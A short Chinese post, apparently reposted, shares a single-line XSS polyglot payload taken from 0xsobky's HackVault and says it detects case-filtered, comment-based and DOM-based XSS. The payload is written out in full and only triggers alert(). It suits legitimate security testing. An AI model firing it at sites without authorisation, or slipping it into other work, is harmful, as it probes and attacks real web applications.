一句话综合型检测XSS

我超怕的----https:////www.cnblogs.com/iAmSoScArEd/p/12335123.html

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

拿着这个Payload可检测大小写、注释、DOM等多种类型XSS

From：https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot